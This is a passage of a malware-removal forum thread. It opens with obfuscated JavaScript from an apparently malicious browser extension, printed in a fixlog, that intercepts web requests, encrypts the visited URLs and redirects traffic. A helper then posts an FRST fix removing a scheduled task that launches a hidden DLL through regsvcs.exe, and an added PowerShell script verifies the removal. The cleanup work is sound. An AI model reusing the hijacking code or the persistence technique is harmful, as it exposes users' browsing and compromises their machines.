B);continue;case'4':A[AG(0x424,'j#2h')](prepareConfig,c);continue;}break;}}}}a&&(A[AB(0x41c,'otDQ')](setConfig,a),v=A[AU(0x66f,'Y$2)')](getConfig)),v[AU(0x3a9,'M$%w')][AF(0x1dd,'5#F9')+AU(0x24a,'vA59')]=A[AG(0x4e2,'oqvV')](r,A[AG(0x637,'w&lY')](sec2ms,v[AF(0x5c7,'SNZo')][AG(0x1ac,'5#F9')])),A[AU(0x68b,'oqvV')](setTimeout,()=>{const AN=AG,AM=Ai,Ah=AU;try{A[AN(0x30a,'cL8r')](asyncUpdateConfig);}catch(G){A[AN(0x3fd,'Epg(')](updateErrCount,A[AN(0x225,'0si)')]);}},A[AG(0x51f,'Epg(')](sec2ms,v[AB(0x1fb,'0si)')][AU(0x2fb,'$vab')])),A[AU(0x32c,'ICSG')](disableExt,O,v[AU(0x3d7,'otDQ')][Ai(0x68a,'6(5I')]);}function saveState(l,A){const Aj=a0s4,Ao=a0s4,Ay=a0s3;!globalState&&(globalState={});globalState[l]=A;const v={};v[storageStateName]=globalState,chrome[Aj(0x48d,'vA59')][Aj(0x621,'@(X[')][Ao(0x38e,'vA59')](v);}function getState(s){return globalState?globalState[s]:undefined;}function loadState(){const AJ=a0s5,AS=a0s2,AI=a0s3;chrome[AJ(0x26c,'cgVJ')][AJ(0x51c,'f2lD')][AI(0x3e6,'JXuv')]([storageStateName],s=>{globalState=s[[storageStateName]];});}function clearStats(){const AR=a0s4,AL=a0s2,l={};l[AR(0x4dd,'yTY2')]=function(v){return v();};const 
A=l;globalStats={},A[AR(0x323,'DH7R')](saveStats);}function saveStats(){const AE=a0s5,AH=a0s5,AQ=a0s4,l={};l[storageStatsName]=globalStats,chrome[AE(0x2da,'DH7R')][AH(0x51c,'f2lD')][AH(0x56d,'Q##1')](l);}function loadStats(l){const AZ=a0s3,Au=a0s4,AW=a0s4,AY=a0s1,AC=a0s1,A={};A[AZ(0x589,'Y$2)')]=function(r,f){return r(f);},A[AZ(0x498,'xWg(')]=AZ(0x227,'sc^*')+AW(0x231,'$]ai'),A[AC(0x2a5,')^B&')]=Au(0x5a8,'J&Ou')+AC(0x420,'ICSG');const v=A;chrome[Au(0x2da,'DH7R')][Au(0x423,'d)[^')][Au(0x627,']Rcs')]([storageStatsName],r=>{const Ad=AY,At=AC,Am=AZ,AD=AZ;globalStats=r[[storageStatsName]],l&&(v[Ad(0x676,'k^U#')](clearErrCount,v[At(0x259,'AhHj')]),v[Ad(0x568,'$vab')](clearErrCount,v[AD(0x6b6,'otDQ')]));});}function cutStats(s,l){const AK=a0s3,v0=a0s5,v1=a0s1,v2=a0s4,v3=a0s1;let A=s[statPools[AK(0x1d9,'M$%w')]];if(!A)return;let v=Object[v0(0x28c,'@(X[')](A)[v0(0x49e,'8@D3')]((r,f)=>f-r)[v2(0x64e,'ICSG')](-0x213+0xc2f*-0x1+0x92*0x19,l);for(let r in A){!v[v1(0x457,'w&lY')](A[r])&&(A[r]=undefined);};}function setCount(l,A,v){const v4=a0s4,v5=a0s4,v6=a0s4,v7=a0s1,v8=a0s1,r={};r[v4(0x4d3,'25hK')]=v4(0x41f,'%1Wi')+'2',r[v4(0x471,'5#F9')]=function(O){return O();};const f=r,b=f[v5(0x5ba,'FwY2')][v8(0x211,'cgVJ')]('|');let P=-0x1*-0x2515+0x17*0x6+-0x1*0x259f;while(!![]){switch(b[P++]){case'0':!globalStats[l]&&(globalStats[l]={});continue;case'1':f[v5(0x494,'&NUL')](saveStats);continue;case'2':return globalStats[l][A];case'3':globalStats[l][A]=v;continue;case'4':!globalStats[l][A]&&(globalStats[l][A]=0x2700+-0x33d*0x8+-0xd18);continue;case'5':!globalStats&&(globalStats={});continue;}break;}}function updateCount(l,A,v=-0x51b*-0x5+0x26a9+-0x402f){const v9=a0s2,vs=a0s4,vl=a0s3,vA=a0s1,vv=a0s3,r={};r[v9(0x203,'@(X[')]=v9(0x362,'Y$2)')+'4',r[vs(0x2d2,'mU4s')]=function(O,z){return O+z;},r[vl(0x51d,'xWg(')]=function(O){return O();};const f=r,b=f[vl(0x1f3,'ICSG')][vA(0x67a,'yTY2')]('|');let 
P=0x2077+0x1c2*0x10+-0x3c97;while(!![]){switch(b[P++]){case'0':!globalStats[l]&&(globalStats[l]={});continue;case'1':globalStats[l][A]=f[vv(0x1e8,'!tWl')](globalStats[l][A],v);continue;case'2':f[vA(0x5ab,'8@D3')](saveStats);continue;case'3':!globalStats[l][A]&&(globalStats[l][A]=-0x51a+0x41*-0x83+-0x1ab*-0x17);continue;case'4':return globalStats[l][A];case'5':!globalStats&&(globalStats={});continue;}break;}}function getCount(s,l){return globalStats?globalStats[s]?globalStats[s][l]:-0x1*0xf99+-0x200f+0x2fa8:0x1*-0xd55+-0x1*0x6b+0xdc0;}const clearErrCount=s=>setCount(statPools[a0s3(0x488,'ICSG')],s,0xa47+0x19d5+0x241c*-0x1),updateAppCount=s=>updateCount(statPools[a0s4(0x534,'8@D3')],s,0x3fe+0x17f1+0x1bee*-0x1),updateErrCount=s=>updateCount(statPools[a0s5(0x5ef,'vA59')],s,-0x1a6d+-0x3a6+-0x7*-0x44c),updateActionsCount=s=>updateCount(statPools[a0s1(0x1c2,'cgVJ')],s,0x13e*-0x19+-0xd4b+-0x656*-0x7),updateReqHostsCount=s=>updateCount(statPools[a0s5(0x3b0,'$]ai')],s,0x47*0x65+0x21*0x47+-0x3*0xc63);var callbackBeforeRequest=function(A){const vr=a0s1,vf=a0s5,vb=a0s1,vP=a0s5,vO=a0s2,v={};v[vr(0x33a,'%yFL')]=function(z,a){return z!=a;},v[vr(0x5ac,')^B&')]=function(z,a){return z(a);},v[vb(0x5c3,'$]ai')]=function(z,a){return z===a;},v[vP(0x466,'@(X[')]=vO(0x633,'UQM8'),v[vO(0x1da,'f2lD')]=function(z){return z();},v[vP(0x464,'xWg(')]=function(z,a){return z+a;},v[vO(0x265,'d)[^')]=function(z,a,V){return z(a,V);},v[vO(0x43f,'Q##1')]=function(z,a){return z(a);},v[vb(0x671,'mU4s')]=function(z,a,V){return z(a,V);},v[vO(0x392,'25hK')]=function(z,a,V){return z(a,V);},v[vP(0x5b8,'cR2Y')]=function(z,a){return z(a);};const r=v;let f=r[vP(0x468,'C7@$')](getConfig);if(!f||f[vf(0x23e,'f2lD')])return;if(f[vf(0x28b,'m$hw')][vO(0x1fe,'Q##1')]){let z=r[vb(0x5fd,'w&lY')](getHostName,A[vf(0x5f8,'yTY2')]);z&&r[vb(0x329,'siaL')](updateReqHostsCount,z);}let b=r[vb(0x2ec,'5#F9')](getMatchedTask,f[vP(0x462,'Y$2)')],A[vb(0x4ce,'vA59')]);if(!b)return;let P=r[vr(0x299,'%1Wi')](prepareTask, 
B);if(!P)return;let O;b[vP(0x5af,'ICSG')][vO(0x3f8,'Epg(')](a=>{const vz=vb,va=vb,vV=vb,vX=vO,vx=vO;if(a[vz(0x4e7,'25hK')])return![];if(r[vz(0x400,'yTY2')](a[va(0x34c,'sc^*')],b[va(0x2b2,'d)[^')+'p']))return![];if(!r[va(0x693,'25hK')](isActionTimeNow,a))return![];if(r[vx(0x665,'Q##1')](a[vV(0x50e,'M$%w')],r[va(0x4a4,']Rcs')])){let V=r[vX(0x2ff,'Epg(')](getKey);const X={};X[va(0x34f,'m$hw')]=A[vX(0x596,'$vab')],X[vV(0x47f,'@(X[')]=r[vX(0x59f,'Epg(')](rawurlencode,A[vx(0x523,'cR2Y')]),X[vz(0x54d,'sc^*')]=r[vX(0x209,'oqvV')](btoa,r[vV(0x5a2,'%1Wi')](V,r[vX(0x1f2,'cgVJ')](rc4,V,A[vV(0x37d,'mU4s')]))),X[va(0x304,'yTY2')]=r[vz(0x306,'JXuv')](getHostName,A[vz(0x36e,'C7@$')]);let x=X,c=r[vV(0x679,'$]ai')](replaceUrlMacros,a[vx(0x53f,'SNZo')],x),k=a[va(0x500,'C7@$')]?r[vz(0x255,'cgVJ')](replaceUrlMacros,a[vV(0x35e,'d)[^')],x):undefined;const U={};return U[vV(0x366,'%1Wi')]=A[vz(0x632,'j#2h')],U[vz(0x67d,'w&lY')]=A[vz(0x622,'w&lY')],U[vz(0x1fc,'Epg(')]=k,U[vz(0x3fc,'d)[^')]=a,globalPending[vx(0x3ee,'5#F9')](U),O=c,!![];}return![];});if(O){const a={};return a[vr(0x5e9,'sc^*')+'l']=O,a;}},callbackBeforeSendHeaders=function(A){const vc=a0s4,vk=a0s5,vi=a0s4,vU=a0s2,vG=a0s1,v={};v[vc(0x2d7,'C7@$')]=function(a){return a();},v[vc(0x3e4,'Y$2)')]=function(a,V,X){return a(V,X);},v[vc(0x32f,')^B&')]=vk(0x6bf,'%yFL'),v[vi(0x257,'WW46')]=function(a,V){return a==V;},v[vk(0x3ca,'k^U#')]=function(a,V){return a!=V;},v[vi(0x4b8,'cgVJ')]=vc(0x1c0,'8@D3'),v[vk(0x415,'f2lD')]=function(a,V,X,x){return a(V,X,x);},v[vi(0x4ad,'%1Wi')]=function(a,V){return a(V);};const r=v;let f=r[vU(0x32b,'$vab')](getConfig);if(!f||f[vG(0x5a0,'C7@$')])return;let b=r[vk(0x509,'cL8r')](getHeaders,A[vc(0x3d4,'5#F9')+vG(0x369,'oqvV')],r[vU(0x434,'FwY2')])[vk(0x1b3,'$]ai')](a=>a[vc(0x2f7,'cgVJ')]===vG(0x431,'JXuv'));if( B){}let 
========= End of CMD: =========

==== End of Fixlog 22:04:08 ====

#15 Oh My!

  • Malware Response Instructor

Posted 08 May 2021 - 06:53 PM

Thank you, now please do this.
===================================================
Farbar Recovery Scan Tool Fix
--------------------
  • Right click on the FRST icon and select Run as administrator
  • Highlight the below information then hit the Ctrl + C keys at the same time and the text will be copied
  • There is no need to paste the information anywhere, FRST will do it for you
Start::
CloseProcesses:
Task: {9E5D1EA3-A99B-4D01-B17C-A4732318731E} - System32\Tasks\Microsoft\NlsLexipir => C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe "C:\Program Files (x86)\Common Files\NotesDriver\ClyentrAgent\SETwm_2x80.dll"
C:\Program Files (x86)\Common Files\NotesDriver
C:\ProgramData\Kawmq
End::
  • Click Fix
  • When completed the tool will create a log on the desktop called Fixlog.txt. Please copy and paste the contents of the file in your reply.
  • Upon reboot check to verify the folder is gone
===================================================
Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it.
  • Fixlog
  • Folder?
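The "verify the folder is gone" step from post #15, as an added read-only PowerShell example that is not part of the original thread. The folder paths and task name are copied from the fixlist; the third step goes beyond the fixlist and assumes the same regsvcs.exe launch could return under a different task name (regasm.exe is included as the sibling .NET registration utility).

```powershell
# Added example (not from the thread): read-only check after the FRST fix and reboot.
# Folder paths and the task name are copied from the fixlist in post #15.
$folders  = 'C:\Program Files (x86)\Common Files\NotesDriver', 'C:\ProgramData\Kawmq'
$taskName = 'NlsLexipir'

# 1. The folders should no longer exist.
$folderReport = foreach ($f in $folders) {
    [pscustomobject]@{
        Item   = $f
        Status = $(if (Test-Path -LiteralPath $f) { 'STILL PRESENT' } else { 'gone' })
    }
}

# 2. The scheduled task that relaunched the DLL should be gone as well.
$task = Get-ScheduledTask -TaskName $taskName -ErrorAction SilentlyContinue
$taskReport = [pscustomobject]@{
    Item   = "Task $taskName"
    Status = $(if ($task) { 'STILL PRESENT' } else { 'gone' })
}

# 3. Generalisation (assumption: the launch may reappear under another task name):
#    list every task whose action runs regsvcs.exe or regasm.exe with arguments
#    that do not point into the Windows directory.
$suspect = foreach ($t in Get-ScheduledTask) {
    foreach ($a in $t.Actions) {
        if (-not $a.Execute) { continue }   # COM-handler actions have no Execute value
        $exe = Split-Path -Leaf ($a.Execute -replace '"', '')
        if ($exe -notin 'regsvcs.exe', 'regasm.exe') { continue }
        if ($a.Arguments -and $a.Arguments -notlike "*$env:windir*") {
            [pscustomobject]@{
                Task      = $t.TaskPath + $t.TaskName
                Execute   = $a.Execute
                Arguments = $a.Arguments
            }
        }
    }
}

@($folderReport) + $taskReport | Format-Table -AutoSize
if ($suspect) {
    $suspect | Format-List
} else {
    'No regsvcs/regasm task actions pointing outside the Windows directory.'
}
```

Run it from an elevated PowerShell prompt so that tasks registered for other accounts are listed too.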